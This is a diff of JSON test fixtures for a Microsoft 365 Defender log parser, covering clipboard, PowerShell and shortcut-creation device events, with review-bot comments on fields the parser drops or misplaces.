Size\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft 
office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": 
"device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:19:26.502777Z", + "action": { + "properties": { + "process": { + "AccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "CommandLine": "\"OUTLOOK.EXE\" ", + "FileSize": 44152968, + "LogonId": "389220681", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Outlook", + "VersionInfoInternalFileName": "Outlook", + "VersionInfoOriginalFileName": "Outlook.exe", + "VersionInfoProductName": "Microsoft Outlook", + "VersionInfoProductVersion": "16.0.17928.20216" + } + }, + "type": "GetClipboardData" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.company.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "157950" + } + } + }, + "process": { + "command_line": "\"OUTLOOK.EXE\" ", + "executable": "c:\\program files\\microsoft office\\root\\outlook.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "outlook.exe", + "parent": { + "name": "exec.exe", + "pid": 18840, + "start": "2024-11-12T08:44:15.150395Z" + }, + "pid": 12824, + "start": "2024-11-12T10:09:31.100455Z", + "user": { + "domain": "account-domain", + "email": "john.doe@account-domain.fr", + "id": "S-1-2-3", + "name": "john.doe" + }, + "working_directory": "c:\\program files\\microsoft office\\root" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json new file mode 100644 index 000000000..ea0ddb0df --- /dev/null 
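Review bot: The expected document keeps no trace of the input's `InitiatingProcessSessionId`, `IsInitiatingProcessRemoteSession` and `InitiatingProcessRemoteSessionIP` (all three are present in `message`), so this fixture cannot catch a regression if the parser is supposed to map them, and for a GetClipboardData event the remote-session flag is precisely what separates a clipboard read inside an RDP session from a local one. If the intake is meant to carry them, pin them here, for example next to `LogonId` under `action.properties.process` as `"SessionId": 12, "IsRemoteSession": false`; if dropping them is deliberate, a sibling fixture with `IsInitiatingProcessRemoteSession: true` would make the choice visible. I cannot see the parser from this hunk, so which of the two applies is for the author to confirm.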
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json 
@@ -0,0 +1,83 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 
1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
"{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 
1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:15:59.550882Z", + "action": { + "properties": { + "process": { + "AccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "CommandLine": "powershell.exe", + 
"FileSize": 450560, + "LogonId": "398124703", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows PowerShell", + "VersionInfoInternalFileName": "POWERSHELL", + "VersionInfoOriginalFileName": "PowerShell.EXE", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "10.0.22621.3085" + } + }, + "type": "PowerShellCommand" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.name.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "134294" + } + } + }, + "process": { + "command_line": "powershell.exe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "powershell.exe", + "parent": { + "name": "WindowsTerminal.exe", + "pid": 884, + "start": "2024-11-12T09:20:42.824676Z" + }, + "pid": 27568, + "start": "2024-11-12T10:15:16.487111Z", + "user": { + "domain": "domain", + "email": "JDOE@domain.fr", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\windows\\system32\\windowspowershell\\v1.0" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json new file mode 100644 index 000000000..37a646715 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json 
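Review bot: The command that was actually run only exists in the input's `AdditionalFields` (`{"Command":"nslookup.exe user01-domain.USER01.local 1.2.3.4"}`) and the expected output surfaces it nowhere; `process.command_line` is just `powershell.exe`, so a PowerShellCommand event reaches detection rules without the PowerShell command line that is its entire content. `AdditionalFields` is a JSON document serialized inside a JSON string, so it has to be decoded a second time before `Command` can be read, and the fixture should then assert the decoded value, e.g. `"powershell": { "command": "nslookup.exe user01-domain.USER01.local 1.2.3.4" }` or whichever field this intake already uses for script content. Until that is pinned, the only way to hunt for the command is a substring match on the raw `message`.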
@@ -0,0 +1,103 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft 
office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft 
Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft 
office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft 
Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:23.330722Z", + "action": { + "properties": { + "process": { + "parent": { + "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "FileSize": 1621656, + "LogonId": "8066492", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Word", + "VersionInfoInternalFileName": "WinWord", + "VersionInfoOriginalFileName": "WinWord.exe", + "VersionInfoProductName": "Microsoft Office", + "VersionInfoProductVersion": "16.0.17928.20216" + } + } + }, + "type": "ShellLinkCreateFileEvent" + }, + "file": { + "directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "FILENAME.LNK" + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "22722" + } + } + }, + "process": { + "name": "FILENAME.LNK", + "parent": { + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": 
"51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + }, + "start": "2024-11-06T16:05:23.113802Z", + "working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "5d5608654828cf052ba013b3c37cbb61", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json index 7428190cf..94b70858f 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json 
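Review bot: The created shortcut is represented as a process: `process.name` is `FILENAME.LNK`, `process.start` is taken from `ProcessCreationTime`, and `process.working_directory` is `C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office`, one level above the `file.directory` (`...\\Office\\Recent`) that the input's `FolderPath` gives; the same off-by-one appears at the top of this chunk (`file.directory` `C:\\Log` versus `process.working_directory` `C:`), which suggests the parser takes the dirname of `FolderPath` even though for DeviceEvents that value is already a directory. A `.LNK` landing in `process.name` will match any rule keyed on process names, so for ShellLinkCreateFileEvent the `process.name` / `process.start` / `process.working_directory` trio should either be dropped or pinned to the real directory here. Two detection-relevant inputs are also lost: `process.parent.args` is emitted in sorted order (`""`, `"I:\\COMPANY\\Service\\FILE.doc"`, `/n`, `/o`), so the `/n <file>` pairing cannot be recovered from `args` although ECS `process.args` is ordered, and `ShellLinkRunAsAdmin` / `IsOnRemovableMedia` from `AdditionalFields` are not mapped at all.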
@@ -16,17 +16,19 @@
 "@timestamp": "2022-09-01T07:46:42.468408Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
- "InitiatingProcessFileSize": 56824728,
- "InitiatingProcessIntegrityLevel": "Medium",
- "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
- "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
- "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
- "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe",
- "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe",
- "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive",
- "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002"
+ "process": {
